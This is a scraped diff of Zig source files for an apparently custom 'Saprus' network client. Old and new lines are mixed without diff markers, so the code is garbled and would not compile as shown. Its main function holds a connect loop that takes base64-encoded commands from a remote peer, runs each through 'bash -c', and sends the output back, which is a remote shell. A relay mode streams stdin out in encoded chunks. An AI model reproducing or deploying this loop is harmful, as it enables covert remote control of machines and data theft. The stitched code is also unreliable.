// We can use `parseParamsComptime` to parse a string into an array of `Param(Help)`.
const params = comptime clap.parseParamsComptime(
\\-h, --help Display this help and exit.
\\-r, --relay <str> A relay message to send.
\\-d, --dest <str> An IPv4 or <= 4 ASCII byte string.
\\-c, --connect <str> A connection message to send.
\\
;
);
const Option = enum { help, relay, dest, connect };
const to_option: StaticStringMap(Option) = .initComptime(.{
.{ "-h", .help },
.{ "--help", .help },
.{ "-r", .relay },
.{ "--relay", .relay },
.{ "-d", .dest },
.{ "--dest", .dest },
.{ "-c", .connect },
.{ "--connect", .connect },
});
// Initialize our diagnostics, which can be used for reporting useful errors.
// This is optional. You can also pass `.{}` to `clap.parse` if you don't
// care about the extra information `Diagnostics` provides.
var diag = clap.Diagnostic{};
var res = clap.parse(clap.Help, &params, clap.parsers.default, .{
.diagnostic = &diag,
.allocator = gpa,
}) catch |err| {
// Report useful error and exit.
diag.report(std.io.getStdErr().writer(), err) catch {};
return err;
};
defer res.deinit();
pub fn main(init: std.process.Init) !void {
// CLI parsing adapted from the example here
// https://codeberg.org/ziglang/zig/pulls/30644
try SaprusClient.init();
defer SaprusClient.deinit();
const args = try init.minimal.args.toSlice(init.arena.allocator());
if (res.args.help != 0) {
return clap.help(std.io.getStdErr().writer(), clap.Help, &params, .{});
}
var flags: struct {
relay: ?[]const u8 = null,
dest: ?[]const u8 = null,
connect: ?[]const u8 = null,
} = .{};
if (args.len == 1) {
flags.connect = "";
} else {
var i: usize = 1;
while (i < args.len) : (i += 1) {
if (to_option.get(args[i])) |opt| {
switch (opt) {
.help => {
std.debug.print("{s}", .{help});
if (res.args.relay) |r| {
const dest = parseDest(res.args.dest);
try SaprusClient.sendRelay(
if (r.len > 0) r else "Hello darkness my old friend",
dest,
gpa,
);
// std.debug.print("Sent: {s}\n", .{r});
return;
},
.relay => {
i += 1;
if (i < args.len) {
flags.relay = args[i];
} else {
flags.relay = "";
}
},
.dest => {
i += 1;
if (i < args.len) {
flags.dest = args[i];
} else {
std.debug.print("-d/--dest requires a string\n", .{});
return error.InvalidArguments;
}
},
.connect => {
i += 1;
if (i < args.len) {
flags.connect = args[i];
} else {
flags.connect = "";
}
},
}
} else {
std.debug.print("Unknown argument: {s}\n", .{args[i]});
return error.InvalidArguments;
}
}
}
if (flags.connect != null and (flags.relay != null or flags.dest != null)) {
std.debug.print("Incompatible arguments.\nCannot use --connect/-c with dest or relay.\n", .{});
return error.InvalidArguments;
}
var client: SaprusClient = undefined;
if (flags.relay != null) {
client = try .init();
defer client.deinit();
var chunk_writer_buf: [2048]u8 = undefined;
var chunk_writer: Writer = .fixed(&chunk_writer_buf);
if (flags.relay.?.len > 0) {
var output_iter = std.mem.window(u8, flags.relay.?, SaprusClient.max_payload_len, SaprusClient.max_payload_len);
while (output_iter.next()) |chunk| {
chunk_writer.end = 0;
try chunk_writer.print("{b64}", .{chunk});
try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest));
try init.io.sleep(.fromMilliseconds(40), .boot);
}
} else {
var stdin_file: std.Io.File = .stdin();
var stdin_file_reader = stdin_file.reader(init.io, &.{});
var stdin_reader = &stdin_file_reader.interface;
var lim_buf: [SaprusClient.max_payload_len]u8 = undefined;
var limited = stdin_reader.limited(.limited(10 * lim_buf.len), &lim_buf);
var stdin = &limited.interface;
while (stdin.fillMore()) {
// Sometimes fillMore will return 0 bytes.
// Skip these
if (stdin.seek == stdin.end) continue;
chunk_writer.end = 0;
try chunk_writer.print("{b64}", .{stdin.buffered()});
try client.sendRelay(init.io, chunk_writer.buffered(), parseDest(flags.dest));
try init.io.sleep(.fromMilliseconds(40), .boot);
try stdin.discardAll(stdin.end);
} else |err| switch (err) {
error.EndOfStream => {
log.debug("end of stdin", .{});
},
else => |e| return e,
}
}
} else if (res.args.connect) |c| {
_ = SaprusClient.connect(if (c.len > 0) c else "Hello darkness my old friend", gpa) catch |err| switch (err) {
error.WouldBlock => null,
else => return err,
};
return;
}
var init_con_buf: [SaprusClient.max_payload_len]u8 = undefined;
var w: Writer = .fixed(&init_con_buf);
try w.print("{b64}", .{flags.connect.?});
if (flags.connect != null) {
reconnect: while (true) {
client = try .init();
defer client.deinit();
log.debug("Starting connection", .{});
try client.socket.setTimeout(if (is_debug) 3 else 25, 0);
var connection = client.connect(init.io, w.buffered()) catch {
log.debug("Connection timed out", .{});
continue;
};
log.debug("Connection started", .{});
next_message: while (true) {
var res_buf: [2048]u8 = undefined;
try client.socket.setTimeout(if (is_debug) 60 else 600, 0);
const next = connection.next(init.io, &res_buf) catch {
continue :reconnect;
};
const b64d = std.base64.standard.Decoder;
var connection_payload_buf: [2048]u8 = undefined;
const connection_payload = connection_payload_buf[0..try b64d.calcSizeForSlice(next)];
b64d.decode(connection_payload, next) catch {
log.debug("Failed to decode message, skipping: '{s}'", .{connection_payload});
continue;
};
var child = std.process.spawn(init.io, .{
.argv = &.{ "bash", "-c", connection_payload },
.stdout = .pipe,
.stderr = .ignore,
.stdin = .ignore,
}) catch continue;
var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined;
var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf);
var is_killed: std.atomic.Value(bool) = .init(false);
var kill_task = try init.io.concurrent(killProcessAfter, .{ init.io, &child, .fromSeconds(3), &is_killed });
defer _ = kill_task.cancel(init.io) catch {};
var cmd_output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
var cmd_output: Writer = .fixed(&cmd_output_buf);
// Maximum of 10 messages of output per command
for (0..10) |_| {
cmd_output.end = 0;
child_output_reader.interface.fill(child_output_reader.interface.buffer.len) catch |err| switch (err) {
error.ReadFailed => continue :next_message, // TODO: check if there is a better way to handle this
error.EndOfStream => {
cmd_output.print("{b64}", .{child_output_reader.interface.buffered()}) catch unreachable;
if (cmd_output.end > 0) {
connection.send(init.io, cmd_output.buffered()) catch |e| {
log.debug("Failed to send connection chunk: {t}", .{e});
continue :next_message;
};
}
break;
},
};
cmd_output.print("{b64}", .{try child_output_reader.interface.takeArray(child_output_buf.len)}) catch unreachable;
connection.send(init.io, cmd_output.buffered()) catch |err| {
log.debug("Failed to send connection chunk: {t}", .{err});
continue :next_message;
};
try init.io.sleep(.fromMilliseconds(40), .boot);
} else {
kill_task.cancel(init.io) catch {};
killProcessAfter(init.io, &child, .zero, &is_killed) catch |err| {
log.debug("Failed to kill process??? {t}", .{err});
continue :next_message;
};
}
if (!is_killed.load(.monotonic)) {
_ = child.wait(init.io) catch |err| {
log.debug("Failed to wait for child: {t}", .{err});
};
}
}
}
}
unreachable;
}
fn killProcessAfter(io: std.Io, proc: *std.process.Child, duration: std.Io.Duration, is_killed: *std.atomic.Value(bool)) !void {
io.sleep(duration, .boot) catch |err| switch (err) {
error.Canceled => return,
else => |e| return e,
};
is_killed.store(true, .monotonic);
proc.kill(io);
return clap.help(std.io.getStdErr().writer(), clap.Help, &params, .{});
}
fn parseDest(in: ?[]const u8) [4]u8 {
@@ -235,20 +77,19 @@ fn parseDest(in: ?[]const u8) [4]u8 {
return res;
}
const addr = std.Io.net.Ip4Address.parse(dest, 0) catch return "FAIL".*;
return addr.bytes;
const addr = std.net.Ip4Address.parse(dest, 0) catch return "FAIL".*;
return @bitCast(addr.sa.addr);
}
return "disc".*;
return "zap\x00".*;
}
const builtin = @import("builtin");
const std = @import("std");
const log = std.log;
const DebugAllocator = std.heap.DebugAllocator(.{});
const ArrayList = std.ArrayList;
const StaticStringMap = std.StaticStringMap;
const zaprus = @import("zaprus");
const SaprusClient = zaprus.Client;
const SaprusMessage = zaprus.Message;
const Writer = std.Io.Writer;
const clap = @import("clap");

View File

@@ -1,164 +1,15 @@
pub const MessageTypeError = error{
NotImplementedSaprusType,
UnknownSaprusType,
};
pub const MessageParseError = MessageTypeError || error{
InvalidMessage,
};
const message = @This();
pub const Message = union(enum(u16)) {
relay: Message.Relay = 0x003C,
connection: Message.Connection = 0x00E9,
/// Type tag for Message union.
/// This is the first value in the actual packet sent over the network.
pub const PacketType = enum(u16) {
relay = 0x003C,
file_transfer = 0x8888,
connection = 0x00E9,
_,
pub const Relay = message.Relay;
pub const Connection = message.Connection;
pub fn toBytes(self: message.Message, buf: []u8) []u8 {
return switch (self) {
inline .relay, .connection => |m| m.toBytes(buf),
else => unreachable,
};
}
pub const parse = message.parse;
};
pub const relay_dest_len = 4;
pub fn parse(bytes: []const u8) MessageParseError!Message {
var in: Reader = .fixed(bytes);
const @"type" = in.takeEnum(std.meta.Tag(Message), .big) catch |err| switch (err) {
error.InvalidEnumTag => return error.UnknownSaprusType,
else => return error.InvalidMessage,
};
const checksum = in.takeArray(2) catch return error.InvalidMessage;
switch (@"type") {
.relay => {
const dest: Relay.Dest = .fromBytes(
in.takeArray(relay_dest_len) catch return error.InvalidMessage,
);
const payload = in.buffered();
return .{
.relay = .{
.dest = dest,
.checksum = checksum.*,
.payload = payload,
},
};
},
.connection => {
const src = in.takeInt(u16, .big) catch return error.InvalidMessage;
const dest = in.takeInt(u16, .big) catch return error.InvalidMessage;
const seq = in.takeInt(u32, .big) catch return error.InvalidMessage;
const id = in.takeInt(u32, .big) catch return error.InvalidMessage;
const reserved = in.takeByte() catch return error.InvalidMessage;
const options = in.takeStruct(Connection.Options, .big) catch return error.InvalidMessage;
const payload = in.buffered();
return .{
.connection = .{
.src = src,
.dest = dest,
.seq = seq,
.id = id,
.reserved = reserved,
.options = options,
.payload = payload,
},
};
},
else => return error.NotImplementedSaprusType,
}
}
test parse {
_ = try parse(&[_]u8{ 0x00, 0x3c, 0x00, 0x17, 0xac, 0x12, 0x01, 0x1e, 0x72, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65, 0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64 });
{
const expected: Message = .{
.connection = .{
.src = 12416,
.dest = 61680,
.seq = 0,
.id = 0,
.reserved = 0,
.options = @bitCast(@as(u8, 100)),
.payload = &[_]u8{ 0x69, 0x61, 0x6d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74 },
},
};
const actual = try parse(&[_]u8{ 0x00, 0xe9, 0x00, 0x18, 0x30, 0x80, 0xf0, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x69, 0x61, 0x6d, 0x64, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74 });
try std.testing.expectEqualDeep(expected, actual);
}
}
const Relay = struct {
dest: Dest,
checksum: [2]u8 = undefined,
payload: []const u8,
pub const Dest = struct {
bytes: [relay_dest_len]u8,
/// Asserts bytes is less than or equal to 4 bytes
pub fn fromBytes(bytes: []const u8) Dest {
var buf: [4]u8 = @splat(0);
std.debug.assert(bytes.len <= buf.len);
@memcpy(buf[0..bytes.len], bytes);
return .{ .bytes = buf };
}
};
pub fn init(dest: Dest, payload: []const u8) Relay {
return .{ .dest = dest, .payload = payload };
}
/// Asserts that buf is large enough to fit the relay message.
pub fn toBytes(self: Relay, buf: []u8) []u8 {
var out: Writer = .fixed(buf);
out.writeInt(u16, @intFromEnum(Message.relay), .big) catch unreachable;
out.writeInt(u16, @intCast(self.payload.len + 4), .big) catch unreachable; // Length field, but unread. Will switch to checksum
out.writeAll(&self.dest.bytes) catch unreachable;
out.writeAll(self.payload) catch unreachable;
return out.buffered();
}
test toBytes {
var buf: [1024]u8 = undefined;
const relay: Relay = .init(
.fromBytes(&.{ 172, 18, 1, 30 }),
// zig fmt: off
&[_]u8{
0x72, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65,
0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64
},
// zig fmt: on
);
// zig fmt: off
var expected = [_]u8{
0x00, 0x3c, 0x00, 0x17, 0xac, 0x12, 0x01, 0x1e, 0x72,
0x65, 0x6d, 0x6f, 0x76, 0x65, 0x20, 0x65, 0x76, 0x65,
0x6e, 0x74, 0x20, 0x6c, 0x6f, 0x67, 0x67, 0x65, 0x64
};
// zig fmt: on
try expectEqualMessageBuffers(&expected, relay.toBytes(&buf));
}
};
const Connection = struct {
src: u16,
dest: u16,
seq: u32,
id: u32,
reserved: u8 = undefined,
options: Options = undefined,
payload: []const u8,
/// Reserved option values.
/// Currently unused.
pub const Options = packed struct(u8) {
/// Reserved option values.
/// Currently unused.
pub const ConnectionOptions = packed struct(u8) {
opt1: bool = false,
opt2: bool = false,
opt3: bool = false,
@@ -167,44 +18,236 @@ const Connection = struct {
opt6: bool = false,
opt7: bool = false,
opt8: bool = false,
};
pub const MessageTypeError = error{
NotImplementedSaprusType,
UnknownSaprusType,
};
pub const MessageParseError = MessageTypeError || error{
InvalidMessage,
};
// ZERO COPY STUFF
// &payload could be a void value that is treated as a pointer to a [*]u8
/// All Saprus messages
pub const Message = packed struct {
const Relay = packed struct {
dest: @Vector(4, u8),
payload: void,
pub fn getPayload(self: *align(1) Relay) []u8 {
const len: *u16 = @ptrFromInt(@intFromPtr(self) - @sizeOf(u16));
return @as([*]u8, @ptrCast(&self.payload))[0 .. len.* - @sizeOf(Relay)];
}
};
const Connection = packed struct {
src_port: u16, // random number > 1024
dest_port: u16, // random number > 1024
seq_num: u32 = 0,
msg_id: u32 = 0,
reserved: u8 = 0,
options: ConnectionOptions = .{},
payload: void,
pub fn getPayload(self: *align(1) Connection) []u8 {
const len: *u16 = @ptrFromInt(@intFromPtr(self) - @sizeOf(u16));
return @as([*]u8, @ptrCast(&self.payload))[0 .. len.* - @sizeOf(Connection)];
}
fn nativeFromNetworkEndian(self: *align(1) Connection) void {
self.src_port = bigToNative(@TypeOf(self.src_port), self.src_port);
self.dest_port = bigToNative(@TypeOf(self.dest_port), self.dest_port);
self.seq_num = bigToNative(@TypeOf(self.seq_num), self.seq_num);
self.msg_id = bigToNative(@TypeOf(self.msg_id), self.msg_id);
}
fn networkFromNativeEndian(self: *align(1) Connection) void {
self.src_port = nativeToBig(@TypeOf(self.src_port), self.src_port);
self.dest_port = nativeToBig(@TypeOf(self.dest_port), self.dest_port);
self.seq_num = nativeToBig(@TypeOf(self.seq_num), self.seq_num);
self.msg_id = nativeToBig(@TypeOf(self.msg_id), self.msg_id);
}
};
/// Asserts that buf is large enough to fit the connection message.
pub fn toBytes(self: Connection, buf: []u8) []u8 {
var out: Writer = .fixed(buf);
out.writeInt(u16, @intFromEnum(Message.connection), .big) catch unreachable;
out.writeInt(u16, @intCast(self.payload.len + 14), .big) catch unreachable; // Saprus length field, unread.
out.writeInt(u16, self.src, .big) catch unreachable;
out.writeInt(u16, self.dest, .big) catch unreachable;
out.writeInt(u32, self.seq, .big) catch unreachable;
out.writeInt(u32, self.id, .big) catch unreachable;
out.writeByte(self.reserved) catch unreachable;
out.writeStruct(self.options, .big) catch unreachable;
out.writeAll(self.payload) catch unreachable;
return out.buffered();
const Self = @This();
const SelfBytes = []align(@alignOf(Self)) u8;
type: PacketType,
length: u16,
bytes: void = {},
/// Takes a byte slice, and returns a Message struct backed by the slice.
/// This properly initializes the top level headers within the slice.
pub fn init(@"type": PacketType, bytes: []align(@alignOf(Self)) u8) *Self {
std.debug.assert(bytes.len >= @sizeOf(Self));
const res: *Self = @ptrCast(bytes.ptr);
res.type = @"type";
res.length = @intCast(bytes.len - @sizeOf(Self));
return res;
}
pub fn lengthForPayloadLength(comptime @"type": PacketType, payload_len: usize) MessageTypeError!u16 {
std.debug.assert(payload_len < std.math.maxInt(u16));
const header_size = @sizeOf(switch (@"type") {
.relay => Relay,
.connection => Connection,
.file_transfer => return MessageTypeError.NotImplementedSaprusType,
else => return MessageTypeError.UnknownSaprusType,
});
return @intCast(payload_len + @sizeOf(Self) + header_size);
}
fn getRelay(self: *Self) *align(1) Relay {
return std.mem.bytesAsValue(Relay, &self.bytes);
}
fn getConnection(self: *Self) *align(1) Connection {
return std.mem.bytesAsValue(Connection, &self.bytes);
}
pub fn getSaprusTypePayload(self: *Self) MessageTypeError!(union(PacketType) {
relay: *align(1) Relay,
file_transfer: void,
connection: *align(1) Connection,
}) {
return switch (self.type) {
.relay => .{ .relay = self.getRelay() },
.connection => .{ .connection = self.getConnection() },
.file_transfer => MessageTypeError.NotImplementedSaprusType,
else => MessageTypeError.UnknownSaprusType,
};
}
pub fn nativeFromNetworkEndian(self: *Self) MessageTypeError!void {
self.type = @enumFromInt(bigToNative(
@typeInfo(@TypeOf(self.type)).@"enum".tag_type,
@intFromEnum(self.type),
));
self.length = bigToNative(@TypeOf(self.length), self.length);
errdefer {
// If the payload specific headers fail, revert the top level header values
self.type = @enumFromInt(nativeToBig(
@typeInfo(@TypeOf(self.type)).@"enum".tag_type,
@intFromEnum(self.type),
));
self.length = nativeToBig(@TypeOf(self.length), self.length);
}
switch (try self.getSaprusTypePayload()) {
.relay => {},
.connection => |*con| con.*.nativeFromNetworkEndian(),
// We know other values are unreachable,
// because they would have returned an error from the switch condition.
else => unreachable,
}
}
pub fn networkFromNativeEndian(self: *Self) MessageTypeError!void {
try switch (try self.getSaprusTypePayload()) {
.relay => {},
.connection => |*con| con.*.networkFromNativeEndian(),
.file_transfer => MessageTypeError.NotImplementedSaprusType,
else => MessageTypeError.UnknownSaprusType,
};
self.type = @enumFromInt(nativeToBig(
@typeInfo(@TypeOf(self.type)).@"enum".tag_type,
@intFromEnum(self.type),
));
self.length = nativeToBig(@TypeOf(self.length), self.length);
}
/// Deprecated.
/// If I need the bytes, I should just pass around the slice that is backing this to begin with.
pub fn asBytes(self: *Self) SelfBytes {
const size = @sizeOf(Self) + self.length;
return @as([*]align(@alignOf(Self)) u8, @ptrCast(self))[0..size];
}
};
test "Round trip" {
{
const expected = [_]u8{ 0x0, 0xe9, 0x0, 0x15, 0x30, 0x80, 0xf0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x64, 0x36, 0x3a, 0x3a, 0x64, 0x61, 0x74, 0x61 };
const msg = (try parse(&expected)).connection;
var res_buf: [expected.len + 1]u8 = undefined; // + 1 to test subslice result.
const res = msg.toBytes(&res_buf);
try expectEqualMessageBuffers(&expected, res);
}
}
test "testing variable length zero copy struct" {
const gpa = std.testing.allocator;
const payload = "Hello darkness my old friend";
// Skip checking the length / checksum, because that is undefined.
fn expectEqualMessageBuffers(expected: []const u8, actual: []const u8) !void {
try std.testing.expectEqualSlices(u8, expected[0..2], actual[0..2]);
try std.testing.expectEqualSlices(u8, expected[4..], actual[4..]);
// Create a view of the byte slice as a Message
const msg: *Message = try .init(gpa, .relay, payload.len);
defer msg.deinit(gpa);
{
// Set the message values
{
// These are both set by the init call.
// msg.type = .relay;
// msg.length = payload_len;
}
const relay = (try msg.getSaprusTypePayload()).relay;
relay.dest = .{ 1, 2, 3, 4 };
@memcpy(relay.getPayload(), payload);
}
{
const bytes = msg.asBytes();
// Print the message as hex using the network byte order
try msg.networkFromNativeEndian();
// We know the error from nativeFromNetworkEndian is unreachable because
// it would have returned an error from networkFromNativeEndian.
defer msg.nativeFromNetworkEndian() catch unreachable;
std.debug.print("network bytes: {x}\n", .{bytes});
std.debug.print("bytes len: {d}\n", .{bytes.len});
}
if (false) {
// Illegal behavior
std.debug.print("{any}\n", .{(try msg.getSaprusTypePayload()).connection});
}
try std.testing.expectEqualDeep(msg, try Message.bytesAsValue(msg.asBytes()));
}
const std = @import("std");
const Allocator = std.mem.Allocator;
const Writer = std.Io.Writer;
const Reader = std.Io.Reader;
const asBytes = std.mem.asBytes;
const nativeToBig = std.mem.nativeToBig;
const bigToNative = std.mem.bigToNative;
test "Round trip Relay toBytes and fromBytes" {
const gpa = std.testing.allocator;
const msg = Message{
.relay = .{
.header = .{ .dest = .{ 255, 255, 255, 255 } },
.payload = "Hello darkness my old friend",
},
};
const to_bytes = try msg.toBytes(gpa);
defer gpa.free(to_bytes);
const from_bytes = try Message.fromBytes(to_bytes, gpa);
defer from_bytes.deinit(gpa);
try std.testing.expectEqualDeep(msg, from_bytes);
}
test "Round trip Connection toBytes and fromBytes" {
const gpa = std.testing.allocator;
const msg = Message{
.connection = .{
.header = .{
.src_port = 0,
.dest_port = 0,
},
.payload = "Hello darkness my old friend",
},
};
const to_bytes = try msg.toBytes(gpa);
defer gpa.free(to_bytes);
const from_bytes = try Message.fromBytes(to_bytes, gpa);
defer from_bytes.deinit(gpa);
try std.testing.expectEqualDeep(msg, from_bytes);
}
test {
std.testing.refAllDeclsRecursive(@This());

View File

@@ -1,13 +1,4 @@
pub const Client = @import("Client.zig");
pub const Connection = @import("Connection.zig");
const msg = @import("message.zig");
pub const PacketType = msg.PacketType;
pub const MessageTypeError = msg.MessageTypeError;
pub const MessageParseError = msg.MessageParseError;
pub const Message = msg.Message;
test {
@import("std").testing.refAllDecls(@This());
}
pub usingnamespace @import("message.zig");